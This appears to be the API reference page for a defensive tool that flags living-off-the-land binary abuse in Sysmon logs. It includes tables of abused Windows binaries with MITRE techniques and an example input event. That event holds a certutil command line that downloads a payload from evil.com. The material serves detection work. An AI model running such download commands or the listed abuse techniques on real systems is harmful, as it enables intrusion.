mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-07-17 05:05:16 +03:00
c47eed6a64
- Fix 25 shell=True subprocess calls with list-based commands - Fix 49 verify=False in defensive skills (env-var override) - Add timeout to 231 HTTP/subprocess/socket calls - Fix 6 SQL injection patterns with whitelist validation - Replace 8 __import__() with standard imports - Remove 701 unused imports across 442 files - Add authorized-testing disclaimers to all offensive skills - Complete 11 incomplete skill directories - Expand 10 stub SKILL.md files with full content - Fix 2 YAML parse errors in frontmatter - Fix 5 pre-existing syntax errors - Convert 22 hardcoded paths/ports to environment variables - Back up 21 redundant skill pairs to .bak - Fix 2 global declaration errors - 724/724 skills with full folder anatomy (SKILL.md + agent.py + api-reference.md + LICENSE) - 0 compile errors across all 724 agent.py files
91 lines
3.1 KiB
Markdown
91 lines
3.1 KiB
Markdown
# API Reference: Detecting Living Off the Land Attacks
|
|
|
|
## CLI Usage
|
|
|
|
```bash
|
|
# Analyze Sysmon EVTX file
|
|
python agent.py sysmon-events.evtx
|
|
|
|
# Analyze Sysmon JSON/JSONL export (one event per line)
|
|
python agent.py sysmon-events.jsonl
|
|
|
|
# Filter output for critical alerts
|
|
python agent.py sysmon-events.evtx 2>/dev/null | grep CRITICAL
|
|
```
|
|
|
|
## LOLBins Detected
|
|
|
|
| Binary | MITRE Technique | Severity | Abuse Type |
|
|
|--------|----------------|----------|------------|
|
|
| certutil.exe | T1218, T1105, T1140 | high | Download, decode, encode |
|
|
| mshta.exe | T1218.005 | high | Remote/inline script execution |
|
|
| rundll32.exe | T1218.011 | critical | JS execution, LSASS dump, DLL loading |
|
|
| regsvr32.exe | T1218.010 | critical | Squiblydoo scriptlet execution |
|
|
| bitsadmin.exe | T1197, T1105 | high | BITS download, job notification |
|
|
| wmic.exe | T1047 | high | Remote process creation, XSL processing |
|
|
| msbuild.exe | T1127.001 | high | Inline task execution from temp/AppData |
|
|
| installutil.exe | T1218.004 | high | Silent uninstall execution |
|
|
| cmstp.exe | T1218.003 | high | INF-based execution |
|
|
| mavinject.exe | T1218.013 | critical | DLL injection into running process |
|
|
| cscript.exe | T1059.005 | medium | Remote/suspicious script execution |
|
|
| wscript.exe | T1059.005 | medium | Remote/suspicious script execution |
|
|
|
|
## Suspicious Parent-Child Pairs Detected
|
|
|
|
| Parent Process | Child Process | MITRE | Severity |
|
|
|---------------|--------------|-------|----------|
|
|
| winword/excel/outlook | cmd/powershell/mshta/certutil | T1204.002 | critical |
|
|
| wmiprvse.exe | cmd/powershell/mshta/rundll32 | T1047 | critical |
|
|
| services.exe | cmd/powershell/mshta/rundll32 | T1543.003 | high |
|
|
| svchost.exe | mshta/regsvr32/msbuild/certutil | T1218 | high |
|
|
|
|
## Network-Suspicious LOLBins
|
|
|
|
LOLBins making outbound network connections are flagged as CRITICAL:
|
|
|
|
certutil.exe, mshta.exe, rundll32.exe, regsvr32.exe, msbuild.exe,
|
|
installutil.exe, bitsadmin.exe, esentutl.exe, expand.exe, replace.exe, cmstp.exe
|
|
|
|
## Input Formats
|
|
|
|
### JSON Events Format
|
|
|
|
```json
|
|
[
|
|
{
|
|
"Image": "C:\\Windows\\System32\\certutil.exe",
|
|
"CommandLine": "certutil -urlcache -f http://evil.com/payload.exe C:\\temp\\p.exe",
|
|
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
|
|
"User": "CORP\\jsmith",
|
|
"UtcTime": "2026-03-19 14:32:15.000",
|
|
"Computer": "WORKSTATION-01"
|
|
}
|
|
]
|
|
```
|
|
|
|
### EVTX Requirements
|
|
|
|
Sysmon EVTX files with:
|
|
- Event ID 1 (Process Creation) with full command-line logging
|
|
- Event ID 3 (Network Connection) for LOLBin network detection
|
|
|
|
## Report Output Schema
|
|
|
|
```json
|
|
{
|
|
"report_date": "2026-03-19T12:00:00+00:00",
|
|
"total_findings": 15,
|
|
"by_severity": {"critical": 3, "high": 8, "medium": 4},
|
|
"by_lolbin": {"certutil.exe": 5, "rundll32.exe": 3, "mshta.exe": 2},
|
|
"mitre_techniques_observed": ["T1047", "T1105", "T1218", "T1218.005", "T1218.011"],
|
|
"findings": []
|
|
}
|
|
```
|
|
|
|
## References
|
|
|
|
- LOLBAS Project: https://lolbas-project.github.io/
|
|
- MITRE ATT&CK Defense Evasion: https://attack.mitre.org/tactics/TA0005/
|
|
- Sysmon Documentation: https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
|
|
- Sigma LOLBin Rules: https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation
|